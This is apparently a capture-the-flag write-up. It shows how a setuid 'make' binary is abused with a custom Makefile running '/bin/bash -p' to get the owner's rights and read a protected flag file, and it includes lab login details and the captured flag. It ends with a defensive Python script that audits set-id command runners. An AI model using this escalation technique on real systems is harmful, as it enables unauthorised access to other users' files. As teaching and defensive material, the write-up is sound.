Log on as guest (password: shu1eKoo) on machine 220.127.116.11.
You will find the hidden validation key in /home/exploit03/.secret.

    $> ssh firstname.lastname@example.org
The goal of this challenge is to read the /home/exploit03/.secret file, which is readable only by the exploit03 user and contains the flag.
By listing the /home/exploit03/project/ directory, we can see these files:

    guest@ns314076:/home/exploit03/project$ ls -la
    total 1704
    dr-xr-xr-x 2 exploit03 exploit03    4096 Apr 30 23:47 .
    dr-xr-xr-x 3 exploit03 exploit03    4096 Apr 29 15:47 ..
    -r-sr-sr-x 1 exploit03 exploit03  549452 Apr 29 15:46 make
    -r--r--r-- 1 exploit03 exploit03 1176037 Apr 30 23:47 make-3.81-alpha.tar.bz2
    -r--r--r-- 1 exploit03 exploit03     269 Apr 29 15:46 Makefile
    guest@ns314076:/home/exploit03/project$
There are three files: make, make-3.81-alpha.tar.bz2 and Makefile. The most interesting one is the make binary, which is setuid and setgid (the -r-sr-sr-x mode in the listing): every time we launch it, the process runs with the rights of its owner, exploit03. Pretty interesting, knowing that we have to read one of exploit03’s files :).
So, with this piece of information, what can we do? Launch the make binary? OK, but it won’t read the .secret file. It only reads the Makefile in order to know what to do.
It would be cool to modify the Makefile in order to insert something like… /bin/sh? 😉
Unfortunately, the Makefile is read-only, meaning that we can’t modify it. Pretty annoying, isn’t it?
But hey, wait a minute!? THIS Makefile is read-only, but what about creating our own Makefile and using it instead of this useless one?
OK, let’s try this!
First, we check man make, to be sure that we can use a Makefile located in another directory.
    guest@ns314076:/home/exploit03/project$ man make
    NAME
           make - GNU make utility to maintain groups of programs

    SYNOPSIS
           make [ -f makefile ] [ options ] ... [ targets ] ...

    [...]

           -f file, --file=file, --makefile=FILE
                Use file as a makefile.
Hmmm… Seems pretty good, no?! Now we just have to create a new Makefile:
    guest@ns314076:/home/exploit03/project$ cd /tmp
    guest@ns314076:/tmp$ mkdir me
    guest@ns314076:/tmp$ cd me
    guest@ns314076:/tmp/me$ nano Makefile
    guest@ns314076:/tmp/me$ cat Makefile
    CP = /bin/cp
    CHMOD = /bin/chmod
    DIR = make-3.81-alpha

    .PHONY: install clean

    all: $(DIR)/make

    $(DIR)/make:
    	/bin/bash -p
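and launch make with this new awesome Makefile. The -p flag matters: without it, bash resets its effective user ID to the real one and the exploit03 rights would be lost. If everything goes well, we should get a shell with exploit03 rights and be able to read the .secret file!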
    guest@ns314076:/tmp/me$ /home/exploit03/project/make -f ./Makefile all
    /bin/bash -p
    bash-4.2$ cat /home/exploit03/.secret
    uY2Waed3ie
    bash-4.2$ exit
    exit
Perfect! The flag of this chall is uY2Waed3ie
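From the administrator's side, the root cause above is a set-id bit on a program that runs whatever commands its caller supplies. The following audit script is an added example, not part of the original write-up; the `COMMAND_RUNNERS` list and the finding labels are assumptions chosen for illustration.

```python
import os
import stat
import sys

# Assumption: a small, non-exhaustive list of programs that execute commands
# or scripts chosen by the caller, so they should never be setuid/setgid.
COMMAND_RUNNERS = {"make", "gmake", "sh", "bash", "dash", "zsh",
                   "python", "python3", "perl", "ruby"}


def classify(name, mode):
    """Return findings for one file, given its basename and st_mode."""
    if not stat.S_ISREG(mode):
        return []  # set-id bits on directories mean something else
    bits = []
    if mode & stat.S_ISUID:
        bits.append("setuid")
    if mode & stat.S_ISGID:
        bits.append("setgid")
    if not bits:
        return []
    findings = ["+".join(bits)]
    if mode & stat.S_IXOTH:
        findings.append("world-executable")  # any local user can trigger it
    if name in COMMAND_RUNNERS:
        findings.append("command-runner")    # caller controls what gets run
    return findings


def audit(root):
    """Walk root and yield (path, mode string, findings) for set-id files."""
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                mode = os.lstat(path).st_mode  # lstat: never follow symlinks
            except OSError:
                continue  # unreadable or vanished entry
            findings = classify(name, mode)
            if findings:
                yield path, stat.filemode(mode), findings


if __name__ == "__main__":
    root = sys.argv[1] if len(sys.argv) > 1 else "/"
    for path, perms, findings in audit(root):
        severity = "HIGH" if "command-runner" in findings else "review"
        print(f"{severity:6} {perms} {path} ({', '.join(findings)})")
```

A file with the mode shown in the listing (-r-sr-sr-x, named make) is reported as HIGH; clearing the bits with `chmod ug-s` on such a file removes the privilege change.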